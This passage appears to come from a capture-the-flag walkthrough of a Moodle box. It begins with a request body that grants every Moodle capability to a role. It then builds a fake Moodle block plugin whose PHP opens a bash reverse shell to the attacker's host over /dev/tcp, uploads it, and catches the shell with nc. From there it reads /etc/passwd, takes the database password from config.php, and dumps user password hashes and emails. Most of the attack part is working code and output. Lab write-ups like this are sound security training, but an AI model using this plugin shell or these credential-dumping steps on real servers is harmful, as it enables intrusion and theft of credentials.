&mod%2Fassignment%3Asubmit=1&mod%2Fassignment%3Aview=1&mod%2Fbook%3Aedit=1&mod%2Fbook%3Aread=1&mod%2Fbook%3Aviewhiddenchapters=1&mod%2Fchat%3Achat=1
&mod%2Fchat%3Adeletelog=1&mod%2Fchat%3Aexportparticipatedsession=1&mod%2Fchat%3Aexportsession=1&mod%2Fchat%3Areadlog=1&mod%2Fchat%3Aview=1&mod%2Fchoice%3Achoose=1
&mod%2Fchoice%3Adeleteresponses=1&mod%2Fchoice%3Adownloadresponses=1&mod%2Fchoice%3Areadresponses=1&mod%2Fchoice%3Aview=1&mod%2Fdata%3Aapprove=1
&mod%2Fdata%3Acomment=1&mod%2Fdata%3Aexportallentries=1&mod%2Fdata%3Aexportentry=1&mod%2Fdata%3Aexportownentry=1&mod%2Fdata%3Aexportuserinfo=1
&mod%2Fdata%3Amanagecomments=1&mod%2Fdata%3Amanageentries=1&mod%2Fdata%3Amanagetemplates=1&mod%2Fdata%3Amanageuserpresets=1&mod%2Fdata%3Arate=1
&mod%2Fdata%3Aview=1&mod%2Fdata%3Aviewallratings=1&mod%2Fdata%3Aviewalluserpresets=1&mod%2Fdata%3Aviewanyrating=1&mod%2Fdata%3Aviewentry=1
&mod%2Fdata%3Aviewrating=1&mod%2Fdata%3Awriteentry=1&mod%2Ffeedback%3Acomplete=1&mod%2Ffeedback%3Acreateprivatetemplate=1&mod%2Ffeedback%3Acreatepublictemplate=1
&mod%2Ffeedback%3Adeletesubmissions=1&mod%2Ffeedback%3Adeletetemplate=1&mod%2Ffeedback%3Aedititems=1&mod%2Ffeedback%3Amapcourse=1&mod%2Ffeedback%3Areceivemail=1
&mod%2Ffeedback%3Aview=1&mod%2Ffeedback%3Aviewanalysepage=1&mod%2Ffeedback%3Aviewreports=1&mod%2Ffolder%3Amanagefiles=1&mod%2Ffolder%3Aview=1
&mod%2Fforum%3Aaddnews=1&mod%2Fforum%3Aaddquestion=1&mod%2Fforum%3Aallowforcesubscribe=1&mod%2Fforum%3Acanoverridecutoff=1&mod%2Fforum%3Acanoverridediscussionlock=1
&mod%2Fforum%3Acanposttomygroups=1&mod%2Fforum%3Acantogglefavourite=1&mod%2Fforum%3Acreateattachment=1&mod%2Fforum%3Adeleteanypost=1
&mod%2Fforum%3Adeleteownpost=1&mod%2Fforum%3Aeditanypost=1&mod%2Fforum%3Aexportdiscussion=1&mod%2Fforum%3Aexportforum=1&mod%2Fforum%3Aexportownpost=1
&mod%2Fforum%3Aexportpost=1&mod%2Fforum%3Agrade=1&mod%2Fforum%3Amanagesubscriptions=1&mod%2Fforum%3Amovediscussions=1&mod%2Fforum%3Apindiscussions=1
&mod%2Fforum%3Apostprivatereply=1&mod%2Fforum%3Apostwithoutthrottling=1&mod%2Fforum%3Arate=1&mod%2Fforum%3Areadprivatereplies=1&mod%2Fforum%3Areplynews=1
&mod%2Fforum%3Areplypost=1&mod%2Fforum%3Asplitdiscussions=1&mod%2Fforum%3Astartdiscussion=1&mod%2Fforum%3Aviewallratings=1&mod%2Fforum%3Aviewanyrating=1
&mod%2Fforum%3Aviewdiscussion=1&mod%2Fforum%3Aviewhiddentimedposts=1&mod%2Fforum%3Aviewqandawithoutposting=1&mod%2Fforum%3Aviewrating=1
&mod%2Fforum%3Aviewsubscribers=1&mod%2Fglossary%3Aapprove=1&mod%2Fglossary%3Acomment=1&mod%2Fglossary%3Aexport=1&mod%2Fglossary%3Aexportentry=1
&mod%2Fglossary%3Aexportownentry=1&mod%2Fglossary%3Aimport=1&mod%2Fglossary%3Amanagecategories=1&mod%2Fglossary%3Amanagecomments=1
&mod%2Fglossary%3Amanageentries=1&mod%2Fglossary%3Arate=1&mod%2Fglossary%3Aview=1&mod%2Fglossary%3Aviewallratings=1&mod%2Fglossary%3Aviewanyrating=1
&mod%2Fglossary%3Aviewrating=1&mod%2Fglossary%3Awrite=1&mod%2Fh5pactivity%3Areviewattempts=1&mod%2Fh5pactivity%3Asubmit=1&mod%2Fh5pactivity%3Aview=1
&mod%2Fimscp%3Aview=1&mod%2Flabel%3Aview=1&mod%2Flesson%3Aedit=1&mod%2Flesson%3Agrade=1&mod%2Flesson%3Amanage=1&mod%2Flesson%3Amanageoverrides=1
&mod%2Flesson%3Aview=1&mod%2Flesson%3Aviewreports=1&mod%2Flti%3Aadmin=1&mod%2Flti%3Amanage=1&mod%2Flti%3Aview=1&mod%2Fpage%3Aview=1&mod%2Fquiz%3Aattempt=1
&mod%2Fquiz%3Adeleteattempts=1&mod%2Fquiz%3Aemailconfirmsubmission=1&mod%2Fquiz%3Aemailnotifysubmission=1&mod%2Fquiz%3Aemailwarnoverdue=1
&mod%2Fquiz%3Agrade=1&mod%2Fquiz%3Aignoretimelimits=1&mod%2Fquiz%3Amanage=1&mod%2Fquiz%3Amanageoverrides=1&mod%2Fquiz%3Apreview=1&mod%2Fquiz%3Aregrade=1
&mod%2Fquiz%3Areviewmyattempts=1&mod%2Fquiz%3Aview=1&mod%2Fquiz%3Aviewreports=1&mod%2Fresource%3Aview=1&mod%2Fscorm%3Adeleteownresponses=1
&mod%2Fscorm%3Adeleteresponses=1&mod%2Fscorm%3Asavetrack=1&mod%2Fscorm%3Askipview=1&mod%2Fscorm%3Aviewreport=1&mod%2Fscorm%3Aviewscores=1
&mod%2Fsurvey%3Adownload=1&mod%2Fsurvey%3Aparticipate=1&mod%2Fsurvey%3Areadresponses=1&mod%2Furl%3Aview=1&mod%2Fwiki%3Acreatepage=1&mod%2Fwiki%3Aeditcomment=1
&mod%2Fwiki%3Aeditpage=1&mod%2Fwiki%3Amanagecomment=1&mod%2Fwiki%3Amanagefiles=1&mod%2Fwiki%3Amanagewiki=1&mod%2Fwiki%3Aoverridelock=1&mod%2Fwiki%3Aviewcomment=1
&mod%2Fwiki%3Aviewpage=1&mod%2Fworkshop%3Aallocate=1&mod%2Fworkshop%3Adeletesubmissions=1&mod%2Fworkshop%3Aeditdimensions=1&mod%2Fworkshop%3Aexportsubmissions=1
&mod%2Fworkshop%3Aignoredeadlines=1&mod%2Fworkshop%3Amanageexamples=1&mod%2Fworkshop%3Aoverridegrades=1&mod%2Fworkshop%3Apeerassess=1
&mod%2Fworkshop%3Apublishsubmissions=1&mod%2Fworkshop%3Asubmit=1&mod%2Fworkshop%3Aswitchphase=1&mod%2Fworkshop%3Aview=1&mod%2Fworkshop%3Aviewallassessments=1
&mod%2Fworkshop%3Aviewallsubmissions=1&mod%2Fworkshop%3Aviewauthornames=1&mod%2Fworkshop%3Aviewauthorpublished=1&mod%2Fworkshop%3Aviewpublishedsubmissions=1
&mod%2Fworkshop%3Aviewreviewernames=1&moodle%2Fbackup%3Abackupactivity=1&moodle%2Fcompetency%3Acoursecompetencyconfigure=1&moodle%2Fcourse%3Aactivityvisibility=1
&moodle%2Fcourse%3Aignoreavailabilityrestrictions=1&moodle%2Fcourse%3Amanageactivities=1&moodle%2Fcourse%3Atogglecompletion=1&moodle%2Fcourse%3Aviewhiddenactivities=1
&moodle%2Fh5p%3Adeploy=1&moodle%2Fh5p%3Asetdisplayoptions=1&moodle%2Fh5p%3Aupdatelibraries=1&moodle%2Fsite%3Aaccessallgroups=1&moodle%2Fsite%3Amanagecontextlocks=1
&moodle%2Fsite%3Atrustcontent=1&moodle%2Fsite%3Aviewanonymousevents=1&moodle%2Fsite%3Aviewfullnames=1&moodle%2Fsite%3Aviewuseridentity=1
&quiz%2Fgrading%3Aviewidnumber=1&quiz%2Fgrading%3Aviewstudentnames=1&quiz%2Fstatistics%3Aview=1&quizaccess%2Fseb%3Abypassseb=1
&quizaccess%2Fseb%3Amanage_filemanager_sebconfigfile=1&quizaccess%2Fseb%3Amanage_seb_activateurlfiltering=1&quizaccess%2Fseb%3Amanage_seb_allowedbrowserexamkeys=1
&quizaccess%2Fseb%3Amanage_seb_allowreloadinexam=1&quizaccess%2Fseb%3Amanage_seb_allowspellchecking=1&quizaccess%2Fseb%3Amanage_seb_allowuserquitseb=1
&quizaccess%2Fseb%3Amanage_seb_enableaudiocontrol=1&quizaccess%2Fseb%3Amanage_seb_expressionsallowed=1&quizaccess%2Fseb%3Amanage_seb_expressionsblocked=1
&quizaccess%2Fseb%3Amanage_seb_filterembeddedcontent=1&quizaccess%2Fseb%3Amanage_seb_linkquitseb=1&quizaccess%2Fseb%3Amanage_seb_muteonstartup=1
&quizaccess%2Fseb%3Amanage_seb_quitpassword=1&quizaccess%2Fseb%3Amanage_seb_regexallowed=1&quizaccess%2Fseb%3Amanage_seb_regexblocked=1
&quizaccess%2Fseb%3Amanage_seb_requiresafeexambrowser=1&quizaccess%2Fseb%3Amanage_seb_showkeyboardlayout=1&quizaccess%2Fseb%3Amanage_seb_showreloadbutton=1
&quizaccess%2Fseb%3Amanage_seb_showsebdownloadlink=1&quizaccess%2Fseb%3Amanage_seb_showsebtaskbar=1&quizaccess%2Fseb%3Amanage_seb_showtime=1
&quizaccess%2Fseb%3Amanage_seb_showwificontrol=1&quizaccess%2Fseb%3Amanage_seb_templateid=1&quizaccess%2Fseb%3Amanage_seb_userconfirmquit=1
&repository%2Fareafiles%3Aview=1&repository%2Fboxnet%3Aview=1&repository%2Fcontentbank%3Aview=1&repository%2Fcoursefiles%3Aview=1&repository%2Fdropbox%3Aview=1
&repository%2Fequella%3Aview=1&repository%2Ffilesystem%3Aview=1&repository%2Fflickr%3Aview=1&repository%2Fflickr_public%3Aview=1&repository%2Fgoogledocs%3Aview=1
&repository%2Flocal%3Aview=1&repository%2Fmerlot%3Aview=0&repository%2Fnextcloud%3Aview=1&repository%2Fonedrive%3Aview=1&repository%2Fpicasa%3Aview=1
&repository%2Frecent%3Aview=1&repository%2Fs3%3Aview=1&repository%2Fskydrive%3Aview=1&repository%2Fupload%3Aview=1&repository%2Furl%3Aview=1
&repository%2Fuser%3Aview=1&repository%2Fwebdav%3Aview=1&repository%2Fwikimedia%3Aview=1&repository%2Fyoutube%3Aview=1&block%2Factivity_modules%3Aaddinstance=1
&block%2Factivity_results%3Aaddinstance=1&block%2Fadmin_bookmarks%3Aaddinstance=1&block%2Fbadges%3Aaddinstance=1&block%2Fblog_menu%3Aaddinstance=1
&block%2Fblog_recent%3Aaddinstance=1&block%2Fblog_tags%3Aaddinstance=1&block%2Fcalendar_month%3Aaddinstance=1&block%2Fcalendar_upcoming%3Aaddinstance=1
&block%2Fcomments%3Aaddinstance=1&block%2Fcompletionstatus%3Aaddinstance=1&block%2Fcourse_list%3Aaddinstance=1&block%2Fcourse_summary%3Aaddinstance=1
&block%2Ffeedback%3Aaddinstance=1&block%2Fglobalsearch%3Aaddinstance=1&block%2Fglossary_random%3Aaddinstance=1&block%2Fhtml%3Aaddinstance=1
&block%2Flogin%3Aaddinstance=1&block%2Fmentees%3Aaddinstance=1&block%2Fmnet_hosts%3Aaddinstance=1&block%2Fmyprofile%3Aaddinstance=1
&block%2Fnavigation%3Aaddinstance=1&block%2Fnews_items%3Aaddinstance=1&block%2Fonline_users%3Aaddinstance=1&block%2Fonline_users%3Aviewlist=1
&block%2Fprivate_files%3Aaddinstance=1&block%2Fquiz_results%3Aaddinstance=1&block%2Frecent_activity%3Aaddinstance=1&block%2Frss_client%3Aaddinstance=1
&block%2Frss_client%3Amanageanyfeeds=1&block%2Frss_client%3Amanageownfeeds=1&block%2Fsearch_forums%3Aaddinstance=1&block%2Fsection_links%3Aaddinstance=1
&block%2Fselfcompletion%3Aaddinstance=1&block%2Fsettings%3Aaddinstance=1&block%2Fsite_main_menu%3Aaddinstance=1&block%2Fsocial_activities%3Aaddinstance=1
&block%2Ftag_flickr%3Aaddinstance=1&block%2Ftag_youtube%3Aaddinstance=1&block%2Ftags%3Aaddinstance=1&moodle%2Fblock%3Aedit=1&moodle%2Fblock%3Aview=1
&moodle%2Fsite%3Amanageblocks=1&savechanges=Save+changes
[*] Install Plugins feature is now available
http://moodle.schooled.htb/moodle/admin/tool/installaddon/index.php
[*] File structure of Moodle Plugin 'shell'
tree shell
shell
├── lang
│  └── en
│  └── block_shell.php
└── version.php
nano version.php
<?php
$plugin->version = 2020061700;
$plugin->component = 'block_shell';
nano shell.php
<?php
$lhost = "xxxxxxxxxx";
$lport = 4435;
exec("bash -c 'bash -i >& /dev/tcp/$lhost/$lport 0>&1'");
$sock = fsockopen($lhost, $lport);
if ($sock) {
exec("sh <&3 >&3 2>&3");
}
?>
[*] Upload 'shell.zip'
http://moodle.schooled.htb/moodle/admin/tool/installaddon/index.php
moodle.schooled.htb
Install plugin from ZIP file
Validating block_shell ... OK
Validation successful, installation can continue
[*] Persistence as user 'www'
http://moodle.schooled.htb/moodle/blocks/shell/lang/en/block_shell.php
nc -lvnp 4435
Listening on 0.0.0.0 4435
Connection received on 10.10.10.234 35800
[www@Schooled /usr/local/www/apache24/data/moodle/admin]$ id
uid=80(www) gid=80(www) groups=80(www)
cat /etc/passwd | grep -v 'nologin'
# $FreeBSD$
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
jamie:*:1001:1001:Jamie:/home/jamie:/bin/sh
steve:*:1002:1002:User &:/home/steve:/bin/csh
cd /usr/local/www
find . -type f | grep -w 'config' | grep -v 'lib'
./apache24/moodledata/muc/config.php
./apache24/data/moodle/cache/classes/config.php
./apache24/data/moodle/mod/quiz/accessrule/seb/config.php
./apache24/data/moodle/mod/chat/gui_ajax/theme/course_theme/config.php
./apache24/data/moodle/mod/chat/gui_ajax/theme/bubble/config.php
./apache24/data/moodle/mod/chat/gui_ajax/theme/compact/config.php
./apache24/data/moodle/config-dist.php
./apache24/data/moodle/theme/classic/config.php
./apache24/data/moodle/theme/boost/config.php
./apache24/data/moodle/backup/cc/schemas/config.xml
./apache24/data/moodle/auth/onlineconfirm/config.html
./apache24/data/moodle/config.php
cat ./apache24/data/moodle/config.php
<?php // Moodle configuration file
unset($CFG);
global $CFG;
$CFG = new stdClass();
$CFG->dbtype = 'mysqli';
$CFG->dblibrary = 'native';
$CFG->dbhost = 'localhost';
$CFG->dbname = 'moodle';
$CFG->dbuser = 'moodle';
$CFG->dbpass = 'PlaybookMaster2020';
$CFG->prefix = 'mdl_';
$CFG->dboptions = array (
'dbpersist' => 0,
'dbport' => 3306,
'dbsocket' => '',
'dbcollation' => 'utf8_unicode_ci',
);
$CFG->wwwroot = 'http://moodle.schooled.htb/moodle';
$CFG->dataroot = '/usr/local/www/apache24/moodledata';
$CFG->admin = 'admin';
$CFG->directorypermissions = 0777;
require_once(__DIR__ . '/lib/setup.php');
moodle:PlaybookMaster2020
locate mysql
...<SNIP>
/usr/local/bin/mysql
/usr/local/bin/mysql -u moodle -pPlaybookMaster2020 -h localhost -e 'show databases;'
Database
information_schema
moodle
/usr/local/bin/mysql -u moodle -pPlaybookMaster2020 -h localhost -e 'use moodle; show tables;'
Tables_in_moodle
mdl_analytics_indicator_calc
mdl_analytics_models
mdl_analytics_models_log
mdl_analytics_predict_samples
mdl_analytics_prediction_actions
mdl_analytics_predictions
mdl_analytics_train_samples
mdl_analytics_used_analysables
mdl_analytics_used_files
mdl_assign
mdl_assign_grades
mdl_assign_overrides
mdl_assign_plugin_config
mdl_assign_submission
mdl_assign_user_flags
mdl_assign_user_mapping
mdl_assignfeedback_comments
mdl_assignfeedback_editpdf_annot
mdl_assignfeedback_editpdf_cmnt
mdl_assignfeedback_editpdf_queue
mdl_assignfeedback_editpdf_quick
mdl_assignfeedback_editpdf_rot
mdl_assignfeedback_file
mdl_assignment
mdl_assignment_submissions
mdl_assignment_upgrade
mdl_assignsubmission_file
mdl_assignsubmission_onlinetext
mdl_auth_oauth2_linked_login
mdl_backup_controllers
mdl_backup_courses
mdl_backup_logs
mdl_badge
mdl_badge_alignment
mdl_badge_backpack
mdl_badge_backpack_oauth2
mdl_badge_criteria
mdl_badge_criteria_met
mdl_badge_criteria_param
mdl_badge_endorsement
mdl_badge_external
mdl_badge_external_backpack
mdl_badge_external_identifier
mdl_badge_issued
mdl_badge_manual_award
mdl_badge_related
mdl_block
mdl_block_instances
mdl_block_positions
mdl_block_recent_activity
mdl_block_recentlyaccesseditems
mdl_block_rss_client
mdl_blog_association
mdl_blog_external
mdl_book
mdl_book_chapters
mdl_cache_filters
mdl_cache_flags
mdl_capabilities
mdl_chat
mdl_chat_messages
mdl_chat_messages_current
mdl_chat_users
mdl_choice
mdl_choice_answers
mdl_choice_options
mdl_cohort
mdl_cohort_members
mdl_comments
mdl_competency
mdl_competency_coursecomp
mdl_competency_coursecompsetting
mdl_competency_evidence
mdl_competency_framework
mdl_competency_modulecomp
mdl_competency_plan
mdl_competency_plancomp
mdl_competency_relatedcomp
mdl_competency_template
mdl_competency_templatecohort
mdl_competency_templatecomp
mdl_competency_usercomp
mdl_competency_usercompcourse
mdl_competency_usercompplan
mdl_competency_userevidence
mdl_competency_userevidencecomp
mdl_config
mdl_config_log
mdl_config_plugins
mdl_contentbank_content
mdl_context
mdl_context_temp
mdl_course
mdl_course_categories
mdl_course_completion_aggr_methd
mdl_course_completion_crit_compl
mdl_course_completion_criteria
mdl_course_completion_defaults
mdl_course_completions
mdl_course_format_options
mdl_course_modules
mdl_course_modules_completion
mdl_course_published
mdl_course_request
mdl_course_sections
mdl_customfield_category
mdl_customfield_data
mdl_customfield_field
mdl_data
mdl_data_content
mdl_data_fields
mdl_data_records
mdl_editor_atto_autosave
mdl_enrol
mdl_enrol_flatfile
mdl_enrol_lti_lti2_consumer
mdl_enrol_lti_lti2_context
mdl_enrol_lti_lti2_nonce
mdl_enrol_lti_lti2_resource_link
mdl_enrol_lti_lti2_share_key
mdl_enrol_lti_lti2_tool_proxy
mdl_enrol_lti_lti2_user_result
mdl_enrol_lti_tool_consumer_map
mdl_enrol_lti_tools
mdl_enrol_lti_users
mdl_enrol_paypal
mdl_event
mdl_event_subscriptions
mdl_events_handlers
mdl_events_queue
mdl_events_queue_handlers
mdl_external_functions
mdl_external_services
mdl_external_services_functions
mdl_external_services_users
mdl_external_tokens
mdl_favourite
mdl_feedback
mdl_feedback_completed
mdl_feedback_completedtmp
mdl_feedback_item
mdl_feedback_sitecourse_map
mdl_feedback_template
mdl_feedback_value
mdl_feedback_valuetmp
mdl_file_conversion
mdl_files
mdl_files_reference
mdl_filter_active
mdl_filter_config
mdl_folder
mdl_forum
mdl_forum_digests
mdl_forum_discussion_subs
mdl_forum_discussions
mdl_forum_grades
mdl_forum_posts
mdl_forum_queue
mdl_forum_read
mdl_forum_subscriptions
mdl_forum_track_prefs
mdl_glossary
mdl_glossary_alias
mdl_glossary_categories
mdl_glossary_entries
mdl_glossary_entries_categories
mdl_glossary_formats
mdl_grade_categories
mdl_grade_categories_history
mdl_grade_grades
mdl_grade_grades_history
mdl_grade_import_newitem
mdl_grade_import_values
mdl_grade_items
mdl_grade_items_history
mdl_grade_letters
mdl_grade_outcomes
mdl_grade_outcomes_courses
mdl_grade_outcomes_history
mdl_grade_settings
mdl_grading_areas
mdl_grading_definitions
mdl_grading_instances
mdl_gradingform_guide_comments
mdl_gradingform_guide_criteria
mdl_gradingform_guide_fillings
mdl_gradingform_rubric_criteria
mdl_gradingform_rubric_fillings
mdl_gradingform_rubric_levels
mdl_groupings
mdl_groupings_groups
mdl_groups
mdl_groups_members
mdl_h5p
mdl_h5p_contents_libraries
mdl_h5p_libraries
mdl_h5p_libraries_cachedassets
mdl_h5p_library_dependencies
mdl_h5pactivity
mdl_h5pactivity_attempts
mdl_h5pactivity_attempts_results
mdl_imscp
mdl_label
mdl_lesson
mdl_lesson_answers
mdl_lesson_attempts
mdl_lesson_branch
mdl_lesson_grades
mdl_lesson_overrides
mdl_lesson_pages
mdl_lesson_timer
mdl_license
mdl_lock_db
mdl_log
mdl_log_display
mdl_log_queries
mdl_logstore_standard_log
mdl_lti
mdl_lti_access_tokens
mdl_lti_submission
mdl_lti_tool_proxies
mdl_lti_tool_settings
mdl_lti_types
mdl_lti_types_config
mdl_ltiservice_gradebookservices
mdl_message
mdl_message_airnotifier_devices
mdl_message_contact_requests
mdl_message_contacts
mdl_message_conversation_actions
mdl_message_conversation_members
mdl_message_conversations
mdl_message_email_messages
mdl_message_popup
mdl_message_popup_notifications
mdl_message_processors
mdl_message_providers
mdl_message_read
mdl_message_user_actions
mdl_message_users_blocked
mdl_messageinbound_datakeys
mdl_messageinbound_handlers
mdl_messageinbound_messagelist
mdl_messages
mdl_mnet_application
mdl_mnet_host
mdl_mnet_host2service
mdl_mnet_log
mdl_mnet_remote_rpc
mdl_mnet_remote_service2rpc
mdl_mnet_rpc
mdl_mnet_service
mdl_mnet_service2rpc
mdl_mnet_session
mdl_mnet_sso_access_control
mdl_mnetservice_enrol_courses
mdl_mnetservice_enrol_enrolments
mdl_modules
mdl_my_pages
mdl_notifications
mdl_oauth2_access_token
mdl_oauth2_endpoint
mdl_oauth2_issuer
mdl_oauth2_system_account
mdl_oauth2_user_field_mapping
mdl_page
mdl_portfolio_instance
mdl_portfolio_instance_config
mdl_portfolio_instance_user
mdl_portfolio_log
mdl_portfolio_mahara_queue
mdl_portfolio_tempdata
mdl_post
mdl_profiling
mdl_qtype_ddimageortext
mdl_qtype_ddimageortext_drags
mdl_qtype_ddimageortext_drops
mdl_qtype_ddmarker
mdl_qtype_ddmarker_drags
mdl_qtype_ddmarker_drops
mdl_qtype_essay_options
mdl_qtype_match_options
mdl_qtype_match_subquestions
mdl_qtype_multichoice_options
mdl_qtype_randomsamatch_options
mdl_qtype_shortanswer_options
mdl_question
mdl_question_answers
mdl_question_attempt_step_data
mdl_question_attempt_steps
mdl_question_attempts
mdl_question_calculated
mdl_question_calculated_options
mdl_question_categories
mdl_question_dataset_definitions
mdl_question_dataset_items
mdl_question_datasets
mdl_question_ddwtos
mdl_question_gapselect
mdl_question_hints
mdl_question_multianswer
mdl_question_numerical
mdl_question_numerical_options
mdl_question_numerical_units
mdl_question_response_analysis
mdl_question_response_count
mdl_question_statistics
mdl_question_truefalse
mdl_question_usages
mdl_quiz
mdl_quiz_attempts
mdl_quiz_feedback
mdl_quiz_grades
mdl_quiz_overrides
mdl_quiz_overview_regrades
mdl_quiz_reports
mdl_quiz_sections
mdl_quiz_slot_tags
mdl_quiz_slots
mdl_quiz_statistics
mdl_quizaccess_seb_quizsettings
mdl_quizaccess_seb_template
mdl_rating
mdl_registration_hubs
mdl_repository
mdl_repository_instance_config
mdl_repository_instances
mdl_repository_onedrive_access
mdl_resource
mdl_resource_old
mdl_role
mdl_role_allow_assign
mdl_role_allow_override
mdl_role_allow_switch
mdl_role_allow_view
mdl_role_assignments
mdl_role_capabilities
mdl_role_context_levels
mdl_role_names
mdl_scale
mdl_scale_history
mdl_scorm
mdl_scorm_aicc_session
mdl_scorm_scoes
mdl_scorm_scoes_data
mdl_scorm_scoes_track
mdl_scorm_seq_mapinfo
mdl_scorm_seq_objective
mdl_scorm_seq_rolluprule
mdl_scorm_seq_rolluprulecond
mdl_scorm_seq_rulecond
mdl_scorm_seq_ruleconds
mdl_search_index_requests
mdl_search_simpledb_index
mdl_sessions
mdl_stats_daily
mdl_stats_monthly
mdl_stats_user_daily
mdl_stats_user_monthly
mdl_stats_user_weekly
mdl_stats_weekly
mdl_survey
mdl_survey_analysis
mdl_survey_answers
mdl_survey_questions
mdl_tag
mdl_tag_area
mdl_tag_coll
mdl_tag_correlation
mdl_tag_instance
mdl_task_adhoc
mdl_task_log
mdl_task_scheduled
mdl_tool_cohortroles
mdl_tool_customlang
mdl_tool_customlang_components
mdl_tool_dataprivacy_category
mdl_tool_dataprivacy_ctxexpired
mdl_tool_dataprivacy_ctxinstance
mdl_tool_dataprivacy_ctxlevel
mdl_tool_dataprivacy_purpose
mdl_tool_dataprivacy_purposerole
mdl_tool_dataprivacy_request
mdl_tool_monitor_events
mdl_tool_monitor_history
mdl_tool_monitor_rules
mdl_tool_monitor_subscriptions
mdl_tool_policy
mdl_tool_policy_acceptances
mdl_tool_policy_versions
mdl_tool_recyclebin_category
mdl_tool_recyclebin_course
mdl_tool_usertours_steps
mdl_tool_usertours_tours
mdl_upgrade_log
mdl_url
mdl_user
mdl_user_devices
mdl_user_enrolments
mdl_user_info_category
mdl_user_info_data
mdl_user_info_field
mdl_user_lastaccess
mdl_user_password_history
mdl_user_password_resets
mdl_user_preferences
mdl_user_private_key
mdl_wiki
mdl_wiki_links
mdl_wiki_locks
mdl_wiki_pages
mdl_wiki_subwikis
mdl_wiki_synonyms
mdl_wiki_versions
mdl_workshop
mdl_workshop_aggregations
mdl_workshop_assessments
mdl_workshop_grades
mdl_workshop_submissions
mdl_workshopallocation_scheduled
mdl_workshopeval_best_settings
mdl_workshopform_accumulative
mdl_workshopform_comments
mdl_workshopform_numerrors
mdl_workshopform_numerrors_map
mdl_workshopform_rubric
mdl_workshopform_rubric_config
mdl_workshopform_rubric_levels
/usr/local/bin/mysql -u moodle -pPlaybookMaster2020 -h localhost -e 'use moodle; show columns from mdl_user'
Field Type Null Key Default Extra
id bigint NO PRI NULL auto_increment
auth varchar(20) NO MUL manual
confirmed tinyint(1) NO MUL 0
policyagreed tinyint(1) NO 0
deleted tinyint(1) NO MUL 0
suspended tinyint(1) NO 0
mnethostid bigint NO MUL 0
username varchar(100) NO
password varchar(255) NO
idnumber varchar(255) NO MUL
firstname varchar(100) NO MUL
lastname varchar(100) NO MUL
email varchar(100) NO MUL
emailstop tinyint(1) NO 0
icq varchar(15) NO
skype varchar(50) NO
yahoo varchar(50) NO
aim varchar(50) NO
msn varchar(50) NO
phone1 varchar(20) NO
phone2 varchar(20) NO
institution varchar(255) NO
department varchar(255) NO
address varchar(255) NO
city varchar(120) NO MUL
country varchar(2) NO MUL
lang varchar(30) NO en
calendartype varchar(30) NO gregorian
theme varchar(50) NO
timezone varchar(100) NO 99
firstaccess bigint NO 0
lastaccess bigint NO MUL 0
lastlogin bigint NO 0
currentlogin bigint NO 0
lastip varchar(45) NO
secret varchar(15) NO
picture bigint NO 0
url varchar(255) NO
description longtext YES NULL
descriptionformat tinyint NO 1
mailformat tinyint(1) NO 1
maildigest tinyint(1) NO 0
maildisplay tinyint NO 2
autosubscribe tinyint(1) NO 1
trackforums tinyint(1) NO 0
timecreated bigint NO 0
timemodified bigint NO 0
trustbitmask bigint NO 0
imagealt varchar(255) YES NULL
lastnamephonetic varchar(255) YES MUL NULL
firstnamephonetic varchar(255) YES MUL NULL
middlename varchar(255) YES MUL NULL
alternatename varchar(255) YES MUL NULL
moodlenetprofile varchar(255) YES NULL
username
password
email
idnumber
secret
auth
moodlenetprofile
/usr/local/bin/mysql -u moodle -pPlaybookMaster2020 -h localhost -e 'use moodle; select username,password,email from mdl_user'
username password email
guest $2y$10$u8DkSWjhZnQhBk1a0g1ug.x79uhkx/sa7euU8TI4FX4TCaXK6uQk2 root@localhost
admin $2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW jamie@staff.schooled.htb
bell_oliver89 $2y$10$N0feGGafBvl.g6LNBKXPVOpkvs8y/axSPyXb46HiFP3C9c42dhvgK bell_oliver89@student.schooled.htb
orchid_sheila89 $2y$10$YMsy0e4x4vKq7HxMsDk.OehnmAcc8tFa0lzj5b1Zc8IhqZx03aryC orchid_sheila89@student.schooled.htb
chard_ellzabeth89 $2y$10$D0Hu9XehYbTxNsf/uZrxXeRp/6pmT1/6A.Q2CZhbR26lCPtf68wUC chard_elizabeth89@student.schooled.htb
morris_jake89 $2y$10$UieCKjut2IMiglWqRCkSzerF.8AnR8NtOLFmDUcQa90lair7LndRy morris_jake89@student.schooled.htb
heel_james89 $2y$10$sjk.jJKsfnLG4r5rYytMge4sJWj4ZY8xeWRIrepPJ8oWlynRc9Eim heel_james89@student.schooled.htb
nash_michael89 $2y$10$yShrS/zCD1Uoy0JMZPCDB.saWGsPUrPyQZ4eAS50jGZUp8zsqF8tu nash_michael89@student.schooled.htb
singh_rakesh89 $2y$10$Yd52KrjMGJwPUeDQRU7wNu6xjTMobTWq3eEzMWeA2KsfAPAcHSUPu singh_rakesh89@student.schooled.htb
taint_marcus89 $2y$10$kFO4L15Elng2Z2R4cCkbdOHyh5rKwnG4csQ0gWUeu2bJGt4Mxswoa taint_marcus89@student.schooled.htb
walls_shaun89 $2y$10$EDXwQZ9Dp6UNHjAF.ZXY2uKV5NBjNBiLx/WnwHiQ87Dk90yZHf3ga walls_shaun89@student.schooled.htb
smith_john89 $2y$10$YRdwHxfstP0on0Yzd2jkNe/YE/9PDv/YC2aVtC97mz5RZnqsZ/5Em smith_john89@student.schooled.htb
white_jack89 $2y$10$PRy8LErZpSKT7YuSxlWntOWK/5LmSEPYLafDd13Nv36MxlT5yOZqK white_jack89@student.schooled.htb
travis_carl89 $2y$10$VO/MiMUhZGoZmWiY7jQxz.Gu8xeThHXCczYB0nYsZr7J5PZ95gj9S travis_carl89@student.schooled.htb
mac_amy89 $2y$10$PgOU/KKquLGxowyzPCUsi.QRTUIrPETU7q1DEDv2Dt.xAjPlTGK3i mac_amy89@student.schooled.htb
james_boris89 $2y$10$N4hGccQNNM9oWJOm2uy1LuN50EtVcba/1MgsQ9P/hcwErzAYUtzWq james_boris89@student.schooled.htb
pierce_allan $2y$10$ia9fKz9.arKUUBbaGo2FM.b7n/QU1WDAFRafgD6j7uXtzQxLyR3Zy pierce_allan89@student.schooled.htb
henry_william89 $2y$10$qj67d57dL/XzjCgE0qD1i.ION66fK0TgwCFou9yT6jbR7pFRXHmIu henry_william89@student.schooled.htb
harper_zoe89 $2y$10$mnYTPvYjDwQtQuZ9etlFmeiuIqTiYxVYkmruFIh4rWFkC3V1Y0zPy harper_zoe89@student.schooled.htb
